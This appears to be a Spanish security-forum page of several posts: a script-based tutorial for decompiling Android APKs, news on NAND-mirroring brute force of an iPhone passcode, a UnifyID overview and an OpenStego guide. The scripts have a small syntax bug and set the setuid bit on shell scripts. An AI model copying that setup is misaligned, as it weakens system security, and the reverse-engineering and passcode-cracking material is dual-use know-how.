Y con esto ya esta. Es bastante sencillo. Pero un poco coñazo, sobretodo si se piensa que esto no se hace de manera habitual (yo no tengo por costumbre descomprimir apk). Si se hace muy de vez en cuando, cada vez que se haga habra que remirar este articulo, o unos apuntes o lo que sea. Por ello, vamos a dejarlo bonico der to con un par de enlaces simbolicos y algunos scripts.

ln -s ~/dex2jar-2.0/d2j-dex2jar.sh /usr/local/bin/dex2jar
chmod +s ~/dex2jar-2.0/d2j-dex2jar.sh ~/dex2jar-2.0/d2j_invoke.sh

El siguiente script, se meterá en /usr/local/bin/decompiler y se le dará permisos de ejecución con chmod +x /usr/local/bin/decompiler. Aviso: hay que tener en cuenta que en ambos scripts se da por supuesto que los programas están en la raiz de /home/$USER. Si no está ahí, deberia adaptarse.

#!/bin/bash

if [ -z "$1" ] || [ -z "$2"]
then
    echo "You need to pass the apk path and the output pasth as an argument. Exiting..."
    exit
fi

java -jar ~/procyon/build/Procyon.Decompiler/libs/procyon-decompiler-0.5.32.jar -jar "$1" -o "$2"

Lo mismo con el siguiente, pero con el nombre de /usr/local/bin/automatic-decompile y se le dará permisos de ejecución con chmod +x /usr/local/bin/automatic-decompile. Este nombre no tiene por que ser así, pero el anterior si que debe llamarse decompiler, ya que está hardcodeado en el siguiente.

#!/bin/bash

if [ -z "$1" ]
then
    echo "You need to pass the apk path as an argument. Exiting..."
    exit
fi

mkdir -p ~/tmp/"$1"
cp "$1" ~/tmp/"$1"/"$1".zip
cd ~/tmp/"$1"/

echo "Unziping apk..."
unzip "$1".zip > /dev/null

echo "Executing dex2jar..."
dex2jar classes.dex 2> /dev/null

echo "Decompiling jar..."
mkdir -p ~/src/"$1"
decompiler classes-dex2jar.jar ~/src/"$1" > /dev/null
echo "Done. The source code is under ~/src/$1/. You can delete ~/tmp."

Y ale. De este modo, para descomprimir un apk sólo habrá que ejecutar:

automatic-decompile /ruta/al/apk

Entonces, se crearán dos directorios, ~/tmp/ ~/src/. El código estará disponible en el segundo, el primero, cómo su nombre indica, se podrá borrar. Más sencillo de recordar entre uso y uso, creo yo.

---

Autor: Bad Daemons
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Que un sistema operativo sea seguro y no pueda ser posible saltarse las pantallas de bloqueo es muy importante a la hora de proteger nuestros datos más sensibles, sin embargo, puede ser un grave problema cuando hay investigaciones policiales de por medio. Una de las últimas veces que se ha hablado de esto fue tras el tiroteo de San Bernardino, en Estados Unidos, cuando el FBI comenzó a intentar desbloquear el iPhone del tirador para poder conseguir más información sobre su personalidad.

Una de las principales características de iOS es su seguridad. Todos los datos que se guardan en los dispositivos están cifrados, cada uno con una clave única e imposible de conseguir, y la pantalla de bloqueo es tan restrictiva que hace imposible saltarse su protección y desbloquear el dispositivo sin el correspondiente código de acceso.

Varios investigadores de seguridad recomendaron al FBI utilizar una técnica conocida como "NAND mirroring", un clonado de la memoria NAND del dispositivo tantas veces como la compañía quisiera de manera que, mediante fuerza bruta, se pudieran probar todos los códigos de acceso posibles hasta dar con el correcto. Al poco de empezar a recibir dichas sugerencias, el director del FBI aseguró que esa técnica no funcionaba y que iban a buscar la forma de romper la seguridad desde una empresa privada del sector.



La técnica rechazada por el FBI para hackear el iPhone es totalmente funcional, lo que pasa es que no la probaron

Sergei Skorobogatov, un investigador de seguridad de la Universidad de Cambridge, en el Reino Unido, ha demostrado cómo ha sido capaz de clonar varias veces los datos de la memoria NAND de un iPhone 5c con iOS 9.3. Tras tener la NAND clonada, el investigador ha utilizado un programa de fuerza bruta para averiguar la contraseña, hasta dar con ella. Es cierto que el proceso es lento (un código de 4 dígitos tardará en torno a 20 horas, mientras que uno de 6 dígitos podría tardar hasta 3 meses), pero es totalmente funcional.

Este investigador de seguridad ha probado que es posible utilizar esta técnica en los iPhone 5c y 6 al utilizar el mismo modelo de NAND, sin embargo, aunque otros smartphones utilicen modelos diferentes, es muy fácil adaptar la técnica para que funcione en ellos.



El investigador de seguridad ha You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login con el fin de que otros puedan conocerla e incluso permitir al FBI tomar nota para otras ocasiones, e incluso permitir a Apple que investigue el suceso e intente solucionar dicho fallo en los nuevos modelos de iPhone.

Finalmente, como suele ocurrir con las organizaciones gubernamentales, el FBI pagó un millón de dólares de los contribuyentes a una empresa privada para que esta desbloqueara el dispositivo. De haber hecho caso a los investigadores de seguridad, el proceso podría haberse logrado invirtiendo solo unos pocos de cientos de dólares.

Investigación: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en inglés)



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el video ha dejado de estar disponible.

Hemos hablado en varias ocasiones sobre diferentes sistemas que tratan de acabar con el uso de las contraseñas, y es que raro es el día que no se conoce una nueva amenaza que trata de robarnos los datos de acceso a nuestras cuentas o que se produzca algún ataque sobre un servicio que acabe con el robo de millones de cuentas que son publicadas o puestas a la venta en la web oscura.

Pues bien, ahora acabamos de conocer un nuevo sistema que pretende enterrar de una vez por todas el uso de contraseñas y que está diseñado para aprender de los hábitos del usuario y crear un patrón de comportamiento para saber si la persona que está haciendo uso del móvil es el propietario o no.



Este curioso sistema ha sido bautizado con el nombre de UnifyID y en lugar de hacer uso de las habituales contraseñas, lo que hace es comenzar a construir un patrón del usuario a partir de los dispositivos que utiliza, lo lugares que frecuenta, la cadencia a la hora de pulsar el teclado, los sitios web que visita e incluso la forma de caminar, gracias a sensores con los que cuentan hoy nuestros smartphones.

Una vez que UnifyID estudie todo el comportamiento del usuario, comienza a construir un perfil del mismo y puede calcular una puntuación basada en la probabilidad de que eres tú y así no tengas que hacer uso de la contraseña de acceso a tus cuentas y seas identificado automáticamente.  Este innovador sistema se va a poner a prueba en una primera fase beta privada esta misma semana en dispositivos iOS, aunque la aplicación para Android llegaría posteriormente.

Para comenzar a probar UnifyID es necesario instalar un complemento en el navegador Chrome y la aplicación móvil diseñada para aprender sobre el comportamiento de cada usuario. Una vez esté todo en el dispositivo, comenzará a registrar los sitios webs que se visitan, la forma y cadencia de teclear, movimientos característicos captados por los diferentes sensores del dispositivos, etc.

Hasta que el sistema sea capaz de reconocer completamente al usuario es probable que le solicite, por ejemplo, identificarse a través del sensor de huellas, pero el objetivo final es que pueda saber si somos nosotros los que estamos al otro lado del terminal y ofrecernos el acceso a nuestras cuentas sin hacer uso de las contraseñas.

Página oficial:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

OpenStego es un software de código abierto distribuido bajo los términos de la Licencia Pública General de GNU versión 2.0.

OpenStego proporciona dos funciones principales:

       ⦁   Ocultación de datos: puede ocultar cualquier dato dentro de un archivo portador (por ejemplo, imágenes).

       ⦁   Marcas de agua (beta): permite añadir marcas de agua a archivos (por ejemplo, imágenes) con una firma invisible. Puede ser utilizado para detectar la copia de archivos no autorizada.



¿Qué es la esteganografía?

La esteganografía es la ciencia de ocultar mensajes secretos dentro de otro mensaje más grande e "inofensivo".  Está en una categoría por encima de la criptografía regular; la cual acaba de esconder  el mensaje original. La esteganografía intenta ocultar el hecho de que hay un mensaje escondido.  Los mensajes tratados con esta técnica a menudo parecen ser algo más que el mensaje original, como una imagen, sonido, texto más grande, etc.


Algunos de los términos relacionados con la esteganografía:

       ⦁   Texto plano (plaintext):  el mensaje secreto original que necesita ser comunicado.

       ⦁   Texto cifrado (ciphertex): el mensaje secreto es a menudo cifrado utilizando métodos tradicionales en primer lugar. Al mensaje cifrado se le conoce como texto cifrado.

       ⦁   Portador (covertext): conjunto de datos o archivo grande e inofensivo que se utiliza como contenedor para el texto plano/texto cifrado. Puede ser una imagen, sonido, texto, etc.

       ⦁   Estego-mensaje  (stegotext):  conjunto de datos generados después de la incorporación del texto plano/texto cifrado en el portador.


El procedimiento normal es primero encriptar el texto plano para generar el texto cifrado, y luego modificar el portador de alguna manera para contener el texto cifrado. El estego-mensaje  generado se envía al destinatario previsto. Si un tercero consigue el estego-mensaje  en el medio de la comunicación, entonces solo verá alguna imagen de aspecto inofensivo (o sonido, etc). Una vez que el destinatario recibe estego-mensaje, el texto cifrado se extrae de él mediante la inversión de la lógica que se utilizó para incrustarlo en primer lugar. El texto cifrado se descifra utilizando la criptografía tradicional para recuperar el texto claro original.



¿Qué es la marca de agua digital?

Es el proceso de incorporación de una marca en archivos que lo permiten, tales como imágenes. Por lo general se utiliza para identificar la propiedad de los derechos de autor. La información oculta debe, aunque no necesariamente, tener relación con el archivo marcado. Las marcas de agua digitales pueden ser utilizadas para verificar la autenticidad o la integridad del archivo, o para mostrar la identidad de sus propietarios. Se utiliza principalmente para el seguimiento de las infracciones de derechos de autor y para la autenticación de billetes. Al igual que las marcas de agua tradicionales, las marcas de agua digitales son solamente perceptibles bajo ciertas condiciones, es decir, después de usar algún algoritmo, y son imperceptibles en cualquier otro momento. Si una marca de agua digital distorsiona el archivo marcado de una manera que se hace perceptible, no es de ninguna utilidad.

OpenStego ofrece sólidas capacidades de marcas de agua digitales de tal manera que la marca de agua no se distorsiona facilmente cuando se redimensiona la imagen, se recorta o se realizan algunas pequeñas modificaciones.




Usar OpenStego:

Usar OpenStego es bastante sencillo. Hay dos modos de funcionamiento (ocultación de datos y marcas de agua).


       ⦁   Ocultación de datos: este modo permite ocultar datos (archivo) dentro de una imagen, o extraer los datos de la imagen. A continuación se muestran capturas de pantalla para ver cómo se realiza correctamente:




       ⦁   Marcas de agua (beta): este modo permite  realizar una marca de agua o verificar las imágenes con su firma. Lo primero que necesitas es generar un archivo de firma, y posteriormente este se utiliza para marcar imágenes o verificar las mismas . Compruebe  las capturas de pantalla a continuación para ver cómo se realiza correctamente:




También es posible usar OpenStego mediante comandos de la terminal.
Información sobre la sintáxis general: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en inglés)





Fuente oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en inglés)
Autor: Samir Vaidya
Github: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Un saludo, HATI